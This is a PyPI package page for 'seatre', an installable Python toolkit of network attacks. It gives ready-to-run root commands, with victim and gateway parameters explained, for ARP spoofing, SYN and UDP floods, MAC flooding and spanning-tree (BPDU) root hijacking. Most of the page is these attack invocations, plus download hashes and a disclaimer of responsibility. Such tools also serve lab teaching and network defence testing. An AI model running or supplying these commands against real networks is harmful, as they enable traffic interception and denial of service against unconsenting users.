Scripts that implement different network attacks
Project description
seatre
A collection of scripts that implement different network attacks. For informational purposes only.
Any contributor to this project doesn't take any responsibility for illegal usage of any script from this project.
See the article about how to use it here.
Installation and Usage
The tested environment:
- Python v3.10
- Ubuntu 22.04 LTS
Make sure that python3-scapy
is installed on your system: sudo apt-get install python3-scapy
You can either run app.py
from a checkout of the code, or install it like any other python project. Keep in mind that a lot of scripts here can be executed only with the root privileges, so you need to run it with sudo.
$ sudo pip3 install seatre
$ sudo seatre
usage: seatre [-h] [--debug] {attack} ...
To enter the debug mode, use the --debug
option after the seatre
command.
To get the attack description in the terminal, enter seatre <attack> --desc
Implemented Attacks
The following commands include the --debug
option, which is not required to execute an attack.
ARP Spoofing
Example usage:
$ sudo seatre --debug arpspoof -i wlp2s0 -m aa:aa:aa:aa:aa:aa -gm BB-BB-BB-BB-BB-BB -gip 192.168.0.1 -vm cc:cc:cc:cc:cc:cc -vip 192.168.0.108
where:
wlp2s0
— your network interfaceaa:aa:aa:aa:aa:aa
— the interface MAC-address (can be written asAA:AA:AA:AA:AA:AA
,AA-AA-AA-AA-AA-AA
andaa-aa-aa-aa-aa-aa
)bb:bb:bb:bb:bb:bb
— the gateway's MAC-address192.168.0.1
— the gateway's IP-addresscc:cc:cc:cc:cc:cc
— the victim's MAC-address192.168.0.108
— the victim's IP-address
Run sudo seatre arpspoof --help
to get more information.
SYN Flood
Example usage:
$ sudo seatre --debug synflood -d 172.17.17.10 -p 443 -c 1000
where:
172.17.17.10
— server's IP-address443
— server's port1000
— the number of packets to be sent
Run sudo seatre synflood --help
to get more information.
UDP Flood
Example usage:
$ sudo seatre --debug udpflood -d 172.17.17.10 -p 53 -c 1000
where:
172.17.17.10
— server's IP-address53
— server's port1000
— the number of packets to be sent
Run sudo seatre udpflood --help
to get more information.
MAC Flood
Example usage:
$ sudo seatre --debug macflood -i wlp2s0 -vm "aa:aa:aa:aa:aa:aa" -c 100000
where:
wlp2s0
— your network interfaceaa:aa:aa:aa:aa:aa
— the victim's MAC-address (can be written asAA:AA:AA:AA:AA:AA
,AA-AA-AA-AA-AA-AA
andaa-aa-aa-aa-aa-aa
)100000
— the number of packets to be sent
Run sudo seatre macflood --help
to get more information.
BPDU Spoofing
Example usage:
sudo seatre --debug stpspoof -i wlp2s0 -smac "aa:aa:aa:aa:aa:aa" -dmac "bb:bb:bb:bb:bb:bb" -p 4096
wlp2s0
— your network interfaceaa:aa:aa:aa:aa:aa
— your MAC-addressbb:bb:bb:bb:bb:bb
— victim switch's MAC-address4096
— priority for choosing the root switch (the lower the number, the higher the priority, so make sure it's low enough to become the root). Must be divisible by 4096
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file seatre-1.0.0.tar.gz
.
File metadata
- Download URL: seatre-1.0.0.tar.gz
- Upload date:
- Size: 20.6 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.0.0 CPython/3.10.12
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 13b14f643c3167a0af7afbccd0c63907bd72f9b875d73c56ba2914e1d1477b04 |
|
MD5 | c7ff3633d6abeb979dc9354681ef659d |
|
BLAKE2b-256 | 6554eb38cfecb63242c963c52de3e21d0dbf95f1621ef393973bc4570f655865 |
File details
Details for the file seatre-1.0.0-py3-none-any.whl
.
File metadata
- Download URL: seatre-1.0.0-py3-none-any.whl
- Upload date:
- Size: 25.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.0.0 CPython/3.10.12
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 1ef4964bba3b018f44aa462bcc3b7037d8cd4adc11ae2411ce642279f59a6c5e |
|
MD5 | 31a5f1a86cc06ba5a0b9908d5c924e11 |
|
BLAKE2b-256 | 05f103e816fdd07396f50585998464a89757531f48e3f77d0b0386a10ef0d3d6 |